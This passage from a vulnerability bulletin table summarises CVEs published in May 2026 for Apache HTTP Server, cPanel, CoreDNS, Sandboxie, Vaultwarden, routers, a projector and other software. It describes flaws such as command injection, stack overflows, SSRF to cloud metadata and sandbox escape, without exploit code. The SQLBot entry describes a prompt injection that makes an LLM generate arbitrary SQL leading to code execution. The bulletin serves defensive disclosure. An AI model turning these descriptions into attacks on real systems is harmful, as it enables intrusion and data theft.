https://github.com/rucio/rucio/security/advisories/GHSA-6j7p-qjhg-9947 |
| Apache Software Foundation--Apache HTTP Server | Allocation of Resources Without Limits or Throttling vulnerability in Apache HTTP Server's mod_md via OCSP response data. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-29168 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | A NULL pointer dereference in mod_dav_lock in Apache HTTP Server 2.4.66 and earlier may allow an attacker to crash the server with a malicious request. mod_dav_lock is not used internally by mod_dav or mod_dav_fs. The only known use-case for mod_dav_lock was mod_dav_svn from Apache Subversion earlier than version 1.2.0. Users are recommended to upgrade to version 2.4.66, which fixes this issue, or remove mod_dav_lock. | 2026-05-04 | not yet calculated | CVE-2026-29169 | https://httpd.apache.org/security/vulnerabilities_24.html |
| phpBB--phpBB | phpBB before 3.3.16 is vulnerable to Host Header Injection that can lead to password reset link poisoning. When force_server_vars is disabled, the server's hostname may be extracted from the HTTP Host header, which is used to generate the password reset link URL. An attacker who can manipulate the Host header (e.g. through misconfigured host setup or missing header validation by the webserver) can cause password reset emails to contain a link pointing to an attacker-controlled domain, potentially leading to account takeover. | 2026-05-04 | not yet calculated | CVE-2026-29199 | https://hackerone.com/reports/3543246 |
| WebPros--Comet Backup | A critical IDOR vulnerability has been discovered in Comet Backup affecting all versions from 20.11.0 to 26.1.1 and 26.2.1. The vulnerability allows a tenant administrator to impersonate any end-user account of other tenants on the same server via a vulnerable API call. | 2026-05-04 | not yet calculated | CVE-2026-29200 | https://support.cometbackup.com/hc/en-us/articles/40090945484823--CVE-2026-29200-%D0%A1ritical-IDOR-vulnerability-in-Comet-Backup |
| WebPros--cPanel | Insufficient input validation of the feature file name in `feature::LOADFEATUREFILE` adminbin call can cause arbitrary file read when a relative file path is passed. | 2026-05-08 | not yet calculated | CVE-2026-29201 | https://support.cpanel.net/hc/en-us/articles/40311033698327-Security-CVE-2026-29201-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| WebPros--cPanel | Insufficient input validation of the `plugin` parameter of the `create_user` plugin allows arbitrary Perl code execution on behalf of the already authenticated account's system user. | 2026-05-08 | not yet calculated | CVE-2026-29202 | https://support.cpanel.net/hc/en-us/articles/40311426610327-Security-CVE-2026-29202-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| WebPros--cPanel | A chmod call in the cPanel Nova plugin's Cpanel::Nova::Connector follows symlinks, allowing setting root permissions on arbitrary system files or directories. That can cause DoS or local privilege escalation when an authenticated cPanel user places a symlink at a user-controlled legacy Nova path under their home directory. | 2026-05-08 | not yet calculated | CVE-2026-29203 | https://support.cpanel.net/hc/en-us/articles/40311543760407-Security-CVE-2026-29203-cPanel-WHM-WP2-Security-Update-May-08-2026 |
| n/a--nanoMODBUS | nanoMODBUS through v1.22.0 has a stack-based buffer overflow in recv_read_registers_res() in nanomodbus.c. When a client calls nmbs_read_holding_registers() or nmbs_read_input_registers(), the library writes register data from the server response to the caller-provided buffer based on the response's byte_count field before validating that byte_count matches the requested quantity. A malicious Modbus TCP server can send a response with byte_count=250 (125 registers) regardless of the requested quantity, causing up to 248 bytes of attacker-controlled data to overflow the buffer, potentially allowing remote code execution. | 2026-05-08 | not yet calculated | CVE-2026-29972 | https://github.com/debevv/nanoMODBUS https://github.com/debevv/nanoMODBUS/blob/master/nanomodbus.c#L580-L615 https://gist.github.com/dwilliams27/a4e26fe747c8561d608f7549804bd85f |
| n/a-- kosma minmea 0.3.0 | An issue was discovered in kosma minmea 0.3.0. The minmea_scan function's format specifier copies NMEA field data to a caller-provided buffer without a size parameter. Applications using minmea_scan on untrusted input are vulnerable to a stack buffer overflow. | 2026-05-08 | not yet calculated | CVE-2026-29974 | https://github.com/kosma/minmea/blob/master/minmea.c#L231-L240 https://gist.github.com/dwilliams27/6d4d8077b970f35e1a921c897ce13852 |
| n/a--lwjson 1.8.1 | lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like "\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service. | 2026-05-08 | not yet calculated | CVE-2026-29975 | https://github.com/MaJerle/lwjson/tree/develop https://github.com/MaJerle/lwjson/blob/develop/lwjson/src/lwjson/lwjson_stream.c#L362-L364 https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103 |
| Optomausa[.]com-- Optoma CinemaX P2 | The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes Android Debug Bridge (ADB) on TCP port 5555 over the network without requiring authentication. The device is configured with ro.adb.secure=0, which disables RSA key verification. Additionally, a functional su binary exists at /system/xbin/su that grants root privileges without authentication. An attacker on the same network can connect to the device via ADB, obtain a shell, and escalate to root privileges, gaining complete control of the device. This allows extraction of stored WiFi credentials, installation of persistent malware, and access to all device data. | 2026-05-07 | not yet calculated | CVE-2026-30495 | https://whitelabel.org/security/2026-02-01-smart-projector/ |
| Optomausa[.]com-- Optoma CinemaX P2 | The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes an HTTP API on TCP port 2345 that allows full unauthenticated remote control of the device. The API supports both reading configuration (74 endpoints) and writing/modifying settings including volume, mute, brightness, power, network protocols enable/disable (including TELNET), display modes, and other projector functions. Any device on the same network can control the projector without authentication. | 2026-05-07 | not yet calculated | CVE-2026-30496 | https://whitelabel.org/security/2026-02-01-smart-projector/ |
| owasp-modsecurity--ModSecurity | ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. Libmodsecurity is one component of the ModSecurity v3 project. A segmentation fault occurs when a rule using the t:hexDecode transformation inspects a query string parameter containing a single character. An attacker can exploit this to crash worker processes, causing a denial of service. Service resumes once the attack stops as worker processes recover from the segfault. All versions before 3.0.15 of libModSecurity3 are affected. This has been patched in version 3.0.15. | 2026-05-05 | not yet calculated | CVE-2026-30923 | https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-qrjc-3jpc-3h2g https://github.com/owasp-modsecurity/ModSecurity/releases/tag/v3.0.15 |
| www[.]alticelabs[.]com-- GR140DG/GR140IG router gateway | The ping diagnostic handler in /bin/httpd_clientside for ALTICE LABS / SFR France GR140DG and GR140IG fibre CPE/Router/Gateway inserts unsanitized user input into a system() call, allowing authenticated remote attackers to execute arbitrary commands as root via crafted destAddr parameters using shell command substitution. | 2026-05-05 | not yet calculated | CVE-2026-31195 | http://altice.com http://gr140dg.com https://xerod.io/advisories/XEROD-2026-0001 |
| www[.]alticelabs[.]com-- GR140DG/GR140IG router gateway | The traceroute diagnostic handler in /bin/httpd_clientside for ALTICE LABS / SFR France GR140DG and GR140IG fibre CPE/Router/Gateway inserts unsanitized user input into a system() call, allowing authenticated remote attackers to execute arbitrary commands as root via crafted destAddr parameters using shell command substitution. | 2026-05-05 | not yet calculated | CVE-2026-31196 | http://altice.com http://gr140dg.com https://xerod.ai/advisories/XEROD-2026-0002 |
| dani-garcia--vaultwarden | Vaultwarden is a Bitwarden-compatible server written in Rust. In versions 1.35.4 and earlier, the WebAuthn authentication flow in `validate_webauthn_login()` updates persistent credential metadata (the `backup_eligible` and `backup_state` flags) based on unverified `authenticatorData` before signature validation is performed. An attacker who knows a user's password but cannot produce a valid WebAuthn signature can permanently modify the stored backup flags for that user's credential. If signature verification fails, the database update is not rolled back. This can result in a persistent denial of service of WebAuthn two-factor authentication for affected credentials. This issue has been fixed in version 1.35.5. | 2026-05-05 | not yet calculated | CVE-2026-31835 | https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-x7g7-cgx5-jhx2 https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.5 |
| Tunnelblick--Tunnelblick | Tunnelblick is an open source graphical user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix socket. The socket is configured with mode 0666, allowing any local user to connect. No authorization check is performed on the connecting client. The tunnelblick-helper process constructs a path to config.ovpn inside a user-controlled .tblk directory and reads it as root without symlink validation. An attacker can create a .tblk configuration with a symlinked config.ovpn pointing to any file and request tunnelblickd to read it. This issue has been fixed in version 9.0beta02. | 2026-05-05 | not yet calculated | CVE-2026-31893 | https://github.com/Tunnelblick/Tunnelblick/security/advisories/GHSA-927j-vcjf-hq69 https://github.com/Tunnelblick/Tunnelblick/releases/tag/v9.0beta02 |
| sandboxie-plus--Sandboxie | Sandboxie is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, a local denial of service vulnerability exists in the Sandboxie kernel driver. An unprivileged process running inside a Standard Sandbox can send a malformed IOCTL to the \Device\SandboxieDriverApi driver, triggering an immediate kernel crash (BSOD). The vulnerability affects the Standard Sandbox configuration both with and without dropped administrator privileges, but does not affect the Security Hardened Sandbox configuration. This issue has been fixed in version 1.17.3. Users who cannot update can use the Security Hardened Sandbox configuration as a workaround. | 2026-05-05 | not yet calculated | CVE-2026-32603 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-vvf8-cf4j-v8fv https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.17.3 |
| ericmj--decimal | Uncontrolled Resource Consumption vulnerability in ericmj decimal allows unauthenticated remote Denial of Service. The decimal library does not bound the exponent on parsed input. Storing a decimal with a very large exponent (e.g. Decimal.new("1e1000000000")) is accepted without error. Subsequent calls to arithmetic functions (Decimal.add/2, Decimal.sub/2, Decimal.div/2), Decimal.to_string/2 with :normal or :xsd format, Decimal.to_integer/1, Decimal.round/3, or Decimal.compare/3 with a threshold allocate memory proportional to the exponent value, which can exhaust available memory and crash the BEAM VM. Any application that accepts user-supplied decimal input and subsequently performs arithmetic, rounding, conversion to integer, or string formatting on it is exposed. A single malicious request is sufficient to cause an out-of-memory crash. This issue affects decimal: from 0.1.0 before 3.0.0. | 2026-05-07 | not yet calculated | CVE-2026-32686 | https://github.com/ericmj/decimal/security/advisories/GHSA-rhv4-8758-jx7v https://cna.erlef.org/cves/CVE-2026-32686.html https://osv.dev/vulnerability/EEF-CVE-2026-32686 https://github.com/ericmj/decimal/commit/6a523f3a73b8c9974540e21c7aa88f1258bb35ae |
| phoenixframework--phoenix | Allocation of Resources Without Limits or Throttling vulnerability in phoenixframework phoenix allows a denial of service via the long-poll transport's NDJSON body handling. In 'Elixir.Phoenix.Transports.LongPoll':publish/4, when a POST request is received with Content-Type: application/x-ndjson, the request body is split on newline characters using String.split/2 with no limit on the number of resulting segments. An attacker can send a body consisting entirely of newline bytes, causing a 1:1 amplification into a list of empty binaries - a 1 MB body produces approximately one million list elements, an 8 MB body approximately 8.4 million. Each element is then walked by Enum.map, materializing another list of the same size. This exhausts BEAM memory and schedulers, crashing the node and terminating all active sessions. A session token required to reach the vulnerable endpoint is freely obtainable by any client via an unauthenticated GET request to the same URL with a matching Origin header, making this attack effectively unauthenticated. This issue affects phoenix: from 1.7.0 before 1.7.22 and 1.8.6. | 2026-05-05 | not yet calculated | CVE-2026-32689 | https://github.com/phoenixframework/phoenix/security/advisories/GHSA-628h-q48j-jr6q https://cna.erlef.org/cves/CVE-2026-32689.html https://osv.dev/vulnerability/EEF-CVE-2026-32689 https://github.com/phoenixframework/phoenix/commit/1a67c61ff9ce0a7711662ac7354861917a7c80f7 https://github.com/phoenixframework/phoenix/commit/912ea181fd247c21dbcc49fb97d0053b947d81bf |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction by intercepting the request and modifying the nick form-data parameter to rename any account, including the administrator account. This leads to unauthorized modification of a field intended to be immutable. | 2026-05-05 | not yet calculated | CVE-2026-32699 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-pp79-hqv6-vmc3 |
| HP, Inc--Samsung Print Service Plugin | Samsung Print Service Plugin for Android is potentially vulnerable to information disclosure when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities. | 2026-05-06 | not yet calculated | CVE-2026-3291 | https://support.hp.com/us-en/document/ish_14864662-14864690-16/hpsbgn04093 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-QUIC (DoQ) server can be driven into unbounded goroutine and memory growth by a remote client that opens many QUIC streams and sends only 1 byte per stream. When the worker pool is full, CoreDNS still spawns a goroutine per accepted stream to wait for a worker token. Additionally, active workers block indefinitely in io.ReadFull() with no per-stream read deadline, allowing an attacker to pin all workers by sending a single byte so the read blocks waiting for the second byte of the DoQ length prefix. This enables an unauthenticated remote attacker to cause memory exhaustion and OOM-kill. This issue has been fixed in version 1.14.3. No known workarounds exist. | 2026-05-05 | not yet calculated | CVE-2026-32934 | https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5 https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-32936 | https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| Apache Software Foundation--Apache HTTP Server | A timing attack against mod_auth_digest in Apache HTTP Server 2.4.66 allows a bypass of Digest authentication by a remote attacker. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-33006 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | A NULL pointer dereference in the mod_authn_socache in Apache HTTP Server 2.4.66 and earlier allows an unauthenticated remote user to crash a child process in a caching forward proxy configuration. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-33007 | https://httpd.apache.org/security/vulnerabilities_24.html |
| lepture--mistune | In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated backslash-punctuation sequences (such as `\!`) with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive. | 2026-05-06 | not yet calculated | CVE-2026-33079 | https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25 |
| Cradle--e-commerce | Open redirection vulnerability in the latest demo version of the Cradle eCommerce platform. The vulnerability occurs in the login form endpoint, where the 'returnUrl' parameter allows redirection because the web application accepts a URL as a parameter without properly validating it. As a result, it is possible to redirect users from the legitimate website to external pages. An attacker could exploit this vulnerability to deceive users and redirect them from a trusted URL to a malicious one without their knowledge. | 2026-05-08 | not yet calculated | CVE-2026-3318 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cradle-e-commerce |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the tsig plugin can be bypassed on non-plain-DNS transports (DoT, DoH, DoH3, DoQ, and gRPC) because it trusts the transport writer's TsigStatus() instead of performing verification itself. The DoH and DoH3 writer's TsigStatus() always returns nil, the DoT server does not set TsigSecret on the dns.Server, and the DoQ and gRPC writers also unconditionally return nil. This allows an unauthenticated remote client to bypass TSIG-based authentication and access resources intended to be restricted behind a tsig require all policy. Plain DNS over TCP and UDP are not affected. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-33190 | https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| dataease--SQLBot | SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering or escaping, and the SQL extracted from the LLM response is executed against the database without validation or sanitization. An authenticated attacker can craft a malicious question to manipulate the LLM into generating and executing arbitrary SQL statements. When connected to a PostgreSQL data source, this can lead to remote code execution via COPY FROM PROGRAM. This issue has been fixed in version 1.7.1. | 2026-05-05 | not yet calculated | CVE-2026-33324 | https://github.com/dataease/SQLBot/security/advisories/GHSA-q2q6-gqqh-4xrx |
| dani-garcia--vaultwarden | Vaultwarden is a Bitwarden-compatible server written in Rust. In version 1.35.4 and earlier, the get_org_collections_details endpoint (GET /api/organizations/{org_id}/collections/details) is missing the has_full_access() authorization check that exists on the sibling get_org_collections endpoint. This allows any Manager-role user with accessAll=False and no collection assignments to retrieve the names, UUIDs, user-to-collection mappings, and group-to-collection mappings for all collections in the organization. This issue has been fixed in version 1.35.5. | 2026-05-05 | not yet calculated | CVE-2026-33420 | https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-jjxg-p3v6-52ww https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.5 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the transfer plugin can select the wrong ACL stanza when both a parent zone and a more-specific subzone are configured. The longestMatch() function in plugin/transfer/transfer.go uses a lexicographic string comparison instead of an actual longest-suffix match to select the winning zone. As a result, a permissive parent-zone transfer rule can override a restrictive subzone rule depending on zone name ordering (e.g., "example.org." > "a.example.org." lexicographically). This allows an unauthorized remote client to perform AXFR/IXFR for the subzone and retrieve its full zone contents. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-33489 | https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3 https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| Apache Software Foundation--Apache HTTP Server | HTTP response splitting vulnerability in multiple Apache HTTP Server modules with untrusted or compromised backend servers. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-33523 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Open Notebook--Open Notebook | Lack of user input sanitisation in Open Notebook v1.8.3 allows the application user to execute Python code (and subsequently OS commands) on the docker container via Server-Side Template Injection (SSTI) for user-created transformations. | 2026-05-07 | not yet calculated | CVE-2026-33587 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-f35w-wx37-26q7 |
| Open Notebook--Open Notebook | Lack of user input validation in the file upload functionality of Open Notebook v1.8.3 allows the application user to create or modify files on the docker container via path traversal. | 2026-05-07 | not yet calculated | CVE-2026-33588 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-x4q2-89g5-594v |
| Open Notebook--Open Notebook | Lack of user input validation in the file upload functionality of Open Notebook v1.8.3 allows the application user to access local files content from the docker container via path traversal. | 2026-05-07 | not yet calculated | CVE-2026-33589 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-842v-h4cj-r646 |
| Go standard library--net | When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash. | 2026-05-07 | not yet calculated | CVE-2026-33811 | https://go.dev/issue/78803 https://go.dev/cl/767860 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4981 |
| golang.org/x/net--golang.org/x/net/http2 | When processing HTTP/2 SETTINGS frames, the transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0. | 2026-05-07 | not yet calculated | CVE-2026-33814 | https://go.dev/cl/761581 https://go.dev/cl/761640 https://go.dev/issue/78476 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4918 |
| Apache Software Foundation--Apache HTTP Server | Out-of-bounds Read vulnerability in mod_proxy_ajp of Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-33857 | https://httpd.apache.org/security/vulnerabilities_24.html |
| twentyhq--twenty | Twenty is an open source CRM built with NestJS (Node.js). In versions 1.18.0 and earlier, the SSRF protection in twenty-server's SecureHttpClientService can be bypassed using IPv4-mapped IPv6 addresses in URL IP literals. Node.js's URL parser normalizes IPv4-mapped IPv6 addresses to compressed hex form (e.g., ::ffff:169.254.169.254 becomes ::ffff:a9fe:a9fe), but the isPrivateIp utility only recognizes the dotted-decimal notation. As a result, the hex form passes the SSRF check. Additionally, the socket lookup validation event does not fire for IP literal addresses, bypassing the second validation layer. An authenticated user can reach any internal IP, including cloud metadata endpoints, to exfiltrate credentials such as IAM keys. | 2026-05-05 | not yet calculated | CVE-2026-33975 | https://github.com/twentyhq/twenty/security/advisories/GHSA-vrcj-hv2q-c58m |
| Apache Software Foundation--Apache HTTP Server | Improper Null Termination, Out-of-bounds Read vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-34032 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Buffer Over-read vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-34059 | https://httpd.apache.org/security/vulnerabilities_24.html |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a library for reading and writing spreadsheet files. In versions 1.30.2 and earlier, 2.0.0 through 2.1.14, 2.2.0 through 2.4.3, 3.3.0 through 3.10.3, and 4.0.0 through 5.5.0, when the filename argument to IOFactory::load() is user-controlled, an attacker can supply a PHP stream wrapper path (such as phar://, ftp://, or ssh2.sftp://) that passes the is_file() check in File::assertFile(). The phar:// wrapper triggers deserialization of the PHAR metadata, which can lead to remote code execution if a suitable gadget chain is available in the application. The ftp:// and ssh2.sftp:// wrappers can be used for server-side request forgery. This issue has been fixed in versions 1.30.3, 2.1.15, 2.4.4, 3.10.4, and 5.6.0. | 2026-05-05 | not yet calculated | CVE-2026-34084 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh |
| www[.]gambio[.]com--Gambio 4.9.2.0 | An issue was discovered in Gambio 4.9.2.0 (patched in 2024-02 v1.0.0 for GX4 v4.0.0.0 to v4.9.2.0). The password reset function can be bypassed to set arbitrary passwords for arbitrary accounts if the ID is known. | 2026-05-05 | not yet calculated | CVE-2026-34408 | https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/ https://herolab.usd.de/security-advisories/usd-2024-0002/ |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, an INI injection vulnerability allows any standard local user to bypass configuration restrictions (EditAdminOnly and ConfigPassword) and inject arbitrary directives into the global Sandboxie.ini configuration file. The background service skips authorization checks for IPC messages targeting sections beginning with UserSettings_, but does not sanitize CRLF characters in either the value parameter (via MSGID_SBIE_INI_ADD_SETTING) or the setting name parameter (via MSGID_SBIE_INI_SET_SETTING). An attacker can inject a new sandbox section header with unrestricted permissions, enabling sandbox escape and SYSTEM privilege escalation. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34458 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-6xqg-2cjq-95qf https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.17.3 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, the SbieSvc proxy service's GetRawInputDeviceInfoSlave handler contains two vulnerabilities that can be chained for sandbox escape. First, when a sandboxed process sends an IPC request with cbSize set to 0, up to 32KB of uninitialized stack memory from the service process is returned, leaking return addresses and stack cookies which bypass ASLR and /GS protections. Second, the handler performs a memcpy with an attacker-controlled length without verifying it fits within the 32KB stack buffer, enabling a stack buffer overflow. By chaining the information leak with the overflow, a sandboxed process can execute a ROP chain to achieve SYSTEM privilege escalation, even from a Security Hardened Sandbox. Hardware-enforced shadow stacks (Intel CET) prevent the ROP chain execution but do not mitigate the information leak. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34459 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-7cpc-5hv7-rfmh |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, the SbieIniServer RunSbieCtrl handler contains a stack buffer overflow. The MSGID_SBIE_INI_RUN_SBIE_CTRL message is handled before normal sandbox and impersonation checks, and for non-sandboxed callers, the handler copies the trailing message payload into a fixed-size WCHAR ctrlCmd[128] stack buffer using memcpy without verifying the length fits within the buffer. The service pipe is created with a NULL DACL, allowing any local interactive process to connect and send an oversized payload to overflow the stack. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34461 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-wpjw-jh2p-gwx7 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, several ProcessServer handlers (KillAllHandler, SuspendAllHandler, and RunSandboxedHandler) copy a WCHAR boxname[34] field from request structures into WCHAR[40] stack buffers using wcscpy without verifying null termination. Because the service pipe accepts variable-length packets larger than the request structure, an attacker can fill the boxname field with non-zero data and append additional controlled wide characters after the structure. wcscpy then reads past the fixed field and overflows the destination stack buffer. The service pipe is created with a NULL DACL, allowing any local process to connect, and the unsafe copy occurs before authorization checks. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34462 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-9cjg-vh9m-hhx4 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, NamedPipeServer::OpenHandler copies the server field from NAMED_PIPE_OPEN_REQ into a fixed WCHAR pipename[160] stack buffer using wcscat without verifying null termination. The handler only enforces a minimum packet size, and since the service pipe accepts variable-length messages, a sandboxed caller can fill the server[48] field with non-zero data and append additional controlled wide characters after the structure. wcscat then reads past the fixed field and overflows the stack buffer in the SYSTEM service. This message is restricted to sandboxed callers, making it a sandbox escape vector. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34464 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-cf8x-f33g-vwfg |
| www[.]zte[.]com--Routers H8102E, H168N, H167A, H199A and more | Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary. | 2026-05-06 | not yet calculated | CVE-2026-34473 | https://www.zte.com.cn/global/ https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9 |
| www[.]zte[.]com--Routers ZTE ZXHN H298A 1.1 and H108N 2.6 | Sensitive data exposure leading to admin/WLAN credential leak in ZTE ZXHN H298A 1.1 and H108N 2.6. A crafted request to the router web interface can expose sensitive device and account information. In affected builds, the response may include the administrator password and WLAN PSK, enabling authentication bypass and network compromise. Some firmware versions may expose only partial identifiers (e.g., serial number, ESSID, MAC addresses). | 2026-05-06 | not yet calculated | CVE-2026-34474 | https://www.zte.com.cn/global/ https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, SbieIniServer::HashPassword converts a SHA-1 digest to hexadecimal incorrectly. The high nibble of each byte is shifted right by 8 instead of 4, which always produces zero for an 8-bit value. As a result, the stored EditPassword hash only preserves the low nibble of each digest byte, reducing the effective entropy from 160 bits to 80 bits. This is layered on top of an unsalted SHA-1 scheme. The reduced entropy makes leaked or backed-up password hashes materially easier to brute-force. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34527 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w37h-qm9p-h4x2 |
